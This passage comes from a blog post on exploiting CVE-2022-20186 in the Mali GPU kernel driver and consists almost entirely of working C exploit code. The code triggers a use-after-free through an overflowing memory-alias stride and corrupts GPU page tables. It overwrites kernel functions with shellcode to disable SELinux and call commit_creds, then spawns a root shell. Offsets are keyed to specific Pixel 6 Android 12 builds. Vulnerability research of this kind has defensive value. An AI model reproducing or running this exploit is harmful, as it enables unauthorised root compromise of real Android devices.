void release_mem_pool(void* drain) {
  munmap(drain, POOL_SIZE * 0x1000);
}

/*
 * 1. reserve_pages: asks the GPU driver to allocate nents blocks of
 *    `pages` pages each and records the returned GPU virtual addresses.
 * 2. map_reserved: maps those blocks into the user process's virtual
 *    address space and updates reserved_va with the user-space addresses.
 */
void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
  for (int i = 0; i < nents; i++) {
    union kbase_ioctl_mem_alloc alloc = {0};
    alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
    int prot = PROT_READ | PROT_WRITE;
    alloc.in.va_pages = pages;
    alloc.in.commit_pages = pages;
    mem_alloc(mali_fd, &alloc);
    reserved_va[i] = alloc.out.gpu_va;
  }
}

void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
  for (int i = 0; i < nents; i++) {
    void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
    if (reserved == MAP_FAILED) {
      err(1, "mmap reserved failed");
    }
    reserved_va[i] = (uint64_t)reserved;
  }
}

uint64_t set_addr_lv3(uint64_t addr) {
  uint64_t pfn = addr >> PAGE_SHIFT;
  pfn &= ~0x1FFUL;
  pfn |= 0x100UL;
  return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
  uint64_t vpfn = addr >> PAGE_SHIFT;
  vpfn >>= (3 - level) * 9;
  return vpfn & 0x1FF;
}

void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
  uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
  uint64_t curr_overwrite_addr = 0;
  for (int i = 0; i < size; i++) {
    uint64_t base = reserved[i];
    uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
    uint64_t start_idx = compute_pt_index(base, 3);
    uint64_t end_idx = compute_pt_index(end, 3);
    for (uint64_t addr = base; addr < end; addr += 0x1000) {
      uint64_t overwrite_addr = set_addr_lv3(addr);
      if (curr_overwrite_addr != overwrite_addr) {
        printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
        curr_overwrite_addr = overwrite_addr;
        for (int code = code_size - 1; code >= 0; code--) {
          write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
        }
        usleep(300000);
      }
    }
  }
}

int run_enforce() {
  char result = '2';
  sleep(3);
  int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
  read(enforce_fd, &result, 1);
  close(enforce_fd);
  printf("result %d\n", result);
  return result;
}

void select_offset() {
  char fingerprint[256];
  int len = __system_property_get("ro.build.fingerprint", fingerprint);
  printf("fingerprint: %s\n", fingerprint);
  if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
    avc_deny = AVC_DENY_2108;
    sel_read_enforce = SEL_READ_ENFORCE_2108;
    fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
    return;
  }
  if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
    avc_deny = AVC_DENY_2201;
    sel_read_enforce = SEL_READ_ENFORCE_2201;
    fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
    return;
  }
  if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
    avc_deny = AVC_DENY_2202;
    sel_read_enforce = SEL_READ_ENFORCE_2202;
    fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
    return;
  }
  err(1, "unable to match build id\n");
}

//Clean up pagetable
void cleanup(int mali_fd, uint64_t gpu_va, uint64_t* reserved, size_t reserved_size) {
  for (int i = 0; i < 2; i++) {
    write_to(mali_fd, gpu_va + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
  }
}

int run_exploit() {
  uint64_t gpu_va[3];
  uint64_t alias_va;
  uint64_t reserved_va[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
  int mali_fd = open_dev(MALI);

  //init environment
  setup_mali(mali_fd);
  setup_tracking_page(mali_fd);

  //reserve_va for spraying pgd from next_pool
  reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, reserved_va);

  //try to drain mem_pool
  void* pool_region = drain_mem_pool(mali_fd);
  printf("mem_pool has been drained.\n");

  //mem_alloc 2 mapping area
  for (int i = 0; i < 2; i++){
    gpu_va[i] = (uint64_t)map_gpu(mali_fd, 3, 0, 1);
    printf("gpu_va[%d] == %lx\n", i, gpu_va[i]);
  }

  //mem_alias to trigger vulnerability
  union kbase_ioctl_mem_alias alias = {0};
  alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
  alias.in.stride = 9223372036854775808ull + 1;

  alias.in.nents = 2;
  struct base_mem_aliasing_info ai[2];
  ai[0].handle.basep.handle = gpu_va[0];
  ai[1].handle.basep.handle = gpu_va[0];
  ai[0].length = 0x3;
  ai[1].length = 0x3;
  ai[0].offset = 0;
  ai[1].offset = 0;
  alias.in.aliasing_info = (uint64_t)(&(ai[0]));
  mem_alias(mali_fd, &alias);
  printf("alias.out.gpu_va == %lx\n", (size_t)alias.out.gpu_va);
  printf("alias.out.va_pages == %lx\n", (size_t)alias.out.va_pages);
  void* alias_region = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
  if (alias_region == MAP_FAILED) {
    err(1, "mmap failed");
  }

  munmap(alias_region, 0x2000);

  //release mem_pool to make mem_pool full
  release_mem_pool(pool_region);
  printf("mem_pool has been released to make sure mem_pool state is full.\n");

  //munmap gpu_va[0] & alias_gpu_va to release area to next_pool where pgd get space from here
  munmap((void *)gpu_va[0], 0x3000);
  printf("munmap UAF page to next_pool.\n");

  //alloc page from next_pool where UAF page just was freed for pgd
  map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, reserved_va);
  printf("try to alloc pgd from next_pool.\n");

  //Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
  for (int i = 0; i < 2; i++) {
    write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
  }

  usleep(100000);
  //Go through the reserve pages addresses to write to sel_read_enforce with our own shellcode
  write_func(mali_fd, avc_deny, &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));

  //Triggers avc_deny to disable SELinux
  open("/dev/kmsg", O_RDONLY);
  printf("Triggers avc_deny to disable SELinux.\n");

  uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;

  //Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
  for (int i = 0; i < 2; i++) {
    write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
  }

  //Call commit_creds to overwrite process credentials to gain root
  write_func(mali_fd, sel_read_enforce, &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));

  run_enforce();
  printf("try to gain root...\n");

  cleanup(mali_fd, gpu_va[1], &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE);
  usleep(100000);

  return 0;
}

int main() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  select_offset();

  int ret = -1;
  sleep(1);
  ret = run_exploit();
  if (!ret) system("sh");
}

Reference:

https://github.blog/security/vulnerability-research/corrupting-memory-without-memory-corruption/

  • Title: CVE-2022-20186 Mali GPU Exploitation
  • Author: henry
  • Created at : 2024-12-02 16:59:07
  • Updated at : 2024-12-02 17:07:08
  • Link: https://henrymartin262.github.io/2024/12/02/CVE-2022-20186/
  • License: This work is licensed under CC BY-NC-SA 4.0.